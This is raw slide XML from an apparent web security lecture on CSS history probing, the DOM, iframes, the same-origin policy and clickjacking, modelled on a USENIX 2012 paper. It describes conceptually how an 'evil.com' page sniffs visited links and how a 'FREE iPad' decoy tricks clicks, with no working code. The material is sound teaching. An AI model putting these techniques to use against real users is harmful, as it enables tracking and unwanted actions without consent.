              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1048440" y="6172200"/>
            <a:ext cx="710496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spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>https://blog.devgenius.io/the-difference-between-cookie-session-and-tokens-79b62df6f860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68653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Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="3429000"/>
            <a:ext cx="4952520" cy="205704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08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CSS History Probing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1009" name="Picture 2" descr="Experimenting with visited links (the ':visited' CSS pseudo-class)"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1562040" y="1295280"/>
            <a:ext cx="6019560" cy="1730160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1010" name="TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="126360" y="6368400"/>
            <a:ext cx="856008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mbria"/>
              </a:rPr>
              <a:t>Image from http://matthewjamestaylor.com/blog/experimenting-with-visited-links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11" name="TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="471240" y="3962520"/>
            <a:ext cx="514332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u="sng" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>http://www.google.com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u="sng" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>http://www.facebook.com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Cambria"/>
              </a:rPr>
              <a:t>http://www.twitter.com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u="sng" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>http://www.facebook.com/group?id=12345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Cambria"/>
              </a:rPr>
              <a:t>http://www.facebook.com/group?id=98765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2" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641160" y="3552120"/>
            <a:ext cx="1327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Cambria"/>
              </a:rPr>
              <a:t>evil.com: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3" name="Rectangular Callout 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6095880" y="3429000"/>
            <a:ext cx="2514240" cy="1208520"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -141209"/>
              <a:gd name="adj2" fmla="val 29325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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Client has visited Google, Facebook and the Facebook Group 12345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4" name="Rectangular Callout 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6095880" y="4823640"/>
            <a:ext cx="2514240" cy="1208520"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -78095"/>
              <a:gd name="adj2" fmla="val -20234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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Client has NOT visited Twitter or Facebook Group 98765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5" name="Rounded Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="5638680"/>
            <a:ext cx="5562360" cy="609120"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj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ambria"/>
              </a:rPr>
              <a:t>Attacker uses JavaScript + CSS to check which links are visited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274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Document Object Model</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="617" name="Rounded Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4522680" y="3796200"/>
            <a:ext cx="1828440" cy="38052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document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8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4141800" y="4593960"/>
            <a:ext cx="990360" cy="38052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head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9" name="Rounded Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5856120" y="4593960"/>
            <a:ext cx="990360" cy="38052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body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0" name="Straight Arrow Connector 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4637160" y="4177440"/>
            <a:ext cx="799920" cy="416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21" name="Straight Arrow Connector 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5437080" y="4177440"/>
            <a:ext cx="914040" cy="416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22" name="Straight Arrow Connector 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3645720" y="4975200"/>
            <a:ext cx="990360" cy="246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23" name="Rounded Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3151080" y="5221440"/>
            <a:ext cx="990360" cy="38052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title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4" name="Rounded Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6895080" y="5221440"/>
            <a:ext cx="533160" cy="38052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5" name="Straight Arrow Connector 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6351480" y="4975200"/>
            <a:ext cx="810000" cy="246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26" name="Straight Arrow Connector 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3379680" y="5602680"/>
            <a:ext cx="266400" cy="441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prstDash val="sysDash"/>
            <a:round/>
            <a:tailEnd type="arrow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27" name="Straight Arrow Connector 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7161840" y="5602680"/>
            <a:ext cx="19440" cy="45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28" name="Rounded Rectangle 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6515280" y="6059880"/>
            <a:ext cx="1333080" cy="32256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Alice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9" name="Rounded Rectangle 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="361800" y="4177440"/>
            <a:ext cx="2381040" cy="1842120"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj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Cambria"/>
              </a:rPr>
              <a:t>A parse tree that is dynamically updated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630" name="Snip Single Corner Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="826920" y="1447920"/>
            <a:ext cx="7619760" cy="1599840"/>
          </a:xfrm>
          <a:prstGeom prst="snip1Rect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="595A5A"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="414242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</a:rPr>
              <a:t>&lt;html&gt;&lt;body&gt;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</a:rPr>
              <a:t>&lt;head&gt;&lt;title&gt;Example&lt;/title&gt; ... &lt;/head&gt;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</a:rPr>
              <a:t>&lt;body&gt;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</a:rPr>
              <a:t>&lt;a id="myid" href="javascript:flipText()"&gt;Alice&lt;/a&gt;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</a:rPr>
              <a:t>&lt;/body&gt;&lt;/html&gt;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1" name="Rounded Rectangle 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4841280" y="5221440"/>
            <a:ext cx="990360" cy="38052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2" name="Straight Arrow Connector 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4637160" y="4975200"/>
            <a:ext cx="699480" cy="246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33" name="Straight Arrow Connector 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5069880" y="5602680"/>
            <a:ext cx="266400" cy="441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prstDash val="sysDash"/>
            <a:round/>
            <a:tailEnd type="arrow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6592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How does the “Like” button work?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1023" name="Picture 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5232240" y="1770480"/>
            <a:ext cx="3421800" cy="1116720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1024" name="Picture 9"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2261160" y="1232640"/>
            <a:ext cx="4672440" cy="537480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1025" name="Picture 10"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="723600" y="1939320"/>
            <a:ext cx="4354200" cy="568440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1026" name="Rounded Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="690120" y="3056400"/>
            <a:ext cx="8191440" cy="64080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ambria"/>
              </a:rPr>
              <a:t>Like button knows about your Facebook session!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027" name="Picture 18"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="690120" y="4014360"/>
            <a:ext cx="8069400" cy="2437920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028" name="Rounded Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5683320" y="4298760"/>
            <a:ext cx="837720" cy="3045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029" name="Rounded Rectangular Callout 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6112800" y="5215320"/>
            <a:ext cx="2666520" cy="1236960"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44134"/>
              <a:gd name="adj2" fmla="val -96078"/>
              <a:gd name="adj3" fmla="val 16667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ambria"/>
              </a:rPr>
              <a:t>Appears in “Mashup” with content from other domains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960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How does the “Like” button work?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1031" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3124080"/>
            <a:ext cx="8229240" cy="2361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Like Button Requirements:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="291960" indent="-2919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Needs to access cookie for domain facebook.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="291960" indent="-2919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Can be deployed on domains other than facebook.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="291960" indent="-2919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Other scripts on the page should not be able to click Like button</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1032" name="Picture 2" descr="http://chrisblattman.com/files/2011/07/facebook_like_button_big1-300x133.jpg"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143160" y="1476360"/>
            <a:ext cx="2857320" cy="1266480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1033" name="Rounded Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5715000"/>
            <a:ext cx="8000640" cy="777600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj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We need to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>isolate</a:t>
            </a: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 the Like button from the rest of the page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156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 err="1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IFrames</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="169A48"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1035" name="Picture 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="635400" y="1143000"/>
            <a:ext cx="4088160" cy="253296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036" name="Left Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4897080" y="1159920"/>
            <a:ext cx="3291480" cy="9140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Parent page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37" name="Left Arrow 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419720" y="2250360"/>
            <a:ext cx="3768840" cy="9140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Embedded page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038" name="Picture 7"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="635400" y="3962520"/>
            <a:ext cx="4088160" cy="26272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039" name="Left Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4389120" y="4978080"/>
            <a:ext cx="3768840" cy="91404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ambria"/>
              </a:rPr>
              <a:t>Any page can be embedded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116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 err="1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IFrames</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="169A48"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1041" name="Picture 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304920" y="1447920"/>
            <a:ext cx="4094280" cy="253656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042" name="Picture 7"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4623840" y="1422360"/>
            <a:ext cx="3986280" cy="25621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043" name="Straight Arrow Connector 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2971800" y="1676520"/>
            <a:ext cx="360" cy="1039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4" name="Straight Arrow Connector 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3352680" y="1663560"/>
            <a:ext cx="360" cy="1039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5" name="Straight Arrow Connector 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7569360" y="1623240"/>
            <a:ext cx="360" cy="1039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6" name="Straight Arrow Connector 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7950240" y="1610280"/>
            <a:ext cx="360" cy="1039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7" name="TextBox 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304920" y="4049280"/>
            <a:ext cx="4094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Pages share same domain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8" name="TextBox 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4623840" y="4053600"/>
            <a:ext cx="39862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Pages do not share same domain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9" name="Multiply 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7010280" y="1610280"/>
            <a:ext cx="1467720" cy="986400"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply">
            <a:avLst>
              <a:gd name="adj1" fmla="val 23520"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="990000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="71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TextBox 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762120" y="4952880"/>
            <a:ext cx="7619760" cy="131544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>
            <a:solidFill>
              <a:srgbClr val="71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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="1" u="sng" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>same-origin policy</a:t>
            </a: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 states that the DOM from one domain should not be able to access the DOM from a different domain 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802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How does the “Like” button work?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1052" name="Picture 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="537120" y="1295280"/>
            <a:ext cx="8069400" cy="2437920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1053" name="Straight Arrow Connector 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5791320" y="1828080"/>
            <a:ext cx="360" cy="2361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595A5A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4" name="TextBox 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481320" y="3242160"/>
            <a:ext cx="8205120" cy="161964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595A5A"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="414242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</a:rPr>
              <a:t>&lt;iframe id="f5b9bb75c" name="f2f3fdd398" scrolling="no" title="Like this content on Facebook." class="fb_ltr" src="http://www.facebook.com/plugins/like.php?api_key=116656161708917..." style="border: none; overflow: hidden; height: 20px; width: 80px;"&gt;&lt;/iframe&gt;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5" name="Rounded Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481320" y="5147280"/>
            <a:ext cx="8205120" cy="114264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The same-origin policy prevents the host from clicking the button and from checking if it’s clicked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95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ounded Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1538640"/>
            <a:ext cx="6933960" cy="152352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Cambria"/>
              </a:rPr>
              <a:t>The same-origin policy prevents malicious sites from clicking their own “Like” button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57" name="Rounded Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1821240" y="3378600"/>
            <a:ext cx="5486040" cy="1142640"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj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Cambria"/>
              </a:rPr>
              <a:t>What if the site can trick you into clicking it yourself?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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857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Clickjacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1059" name="Rounded Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5092200" y="3701880"/>
            <a:ext cx="3200040" cy="1266480"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj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Cambria"/>
              </a:rPr>
              <a:t>Click for a FREE iPad!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060" name="Picture 2" descr="http://chrisblattman.com/files/2011/07/facebook_like_button_big1-300x133.jpg"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066680" y="3736080"/>
            <a:ext cx="2857320" cy="1266480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1061" name="Picture 8"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477120" y="5564880"/>
            <a:ext cx="546480" cy="835560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1062" name="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240" cy="1904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i="1" u="sng" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Cambria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latin typeface="Cambria"/>
              </a:rPr>
              <a:t>occurs when a malicious site tricks the user into clicking on some element on the page unintentionally.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1063" name="TextBox 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-18360" y="6158520"/>
            <a:ext cx="8857080" cy="81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mbria"/>
              </a:rPr>
              <a:t>Slides modeled after presentation by Lin-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mbria"/>
              </a:rPr>
              <a:t>Shung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t> Huang at USENIX 2012.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mbria"/>
              </a:rPr>
              <a:t>Paper: Lin-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mbria"/>
              </a:rPr>
              <a:t>Shung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t> Huang, Alex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mbria"/>
              </a:rPr>
              <a:t>Moshchuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>, Helen J. Wang, Stuart Schechter, and Collin Jackson. 2012. Clickjacking: attacks and defenses. In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Proceedings of the 21st USENIX conference on Security symposium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t> (Security'12). USENIX Association, Berkeley, CA, USA, 22-22.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672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006 -3.7037E-006 L -0.00486 -0.19699 E">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="5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006 1.48148E-006 L 0.46041 -0.00347 E">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="25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Clickjacking </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1065" name="Rounded Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5016240" y="2306880"/>
            <a:ext cx="3200040" cy="1266480"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj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Cambria"/>
              </a:rPr>
              <a:t>Click for a FREE iPad!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066" name="Picture 2" descr="http://chrisblattman.com/files/2011/07/facebook_like_button_big1-300x133.jpg"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="990720" y="2341080"/>
            <a:ext cx="2857320" cy="1266480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1067" name="Picture 6"/>
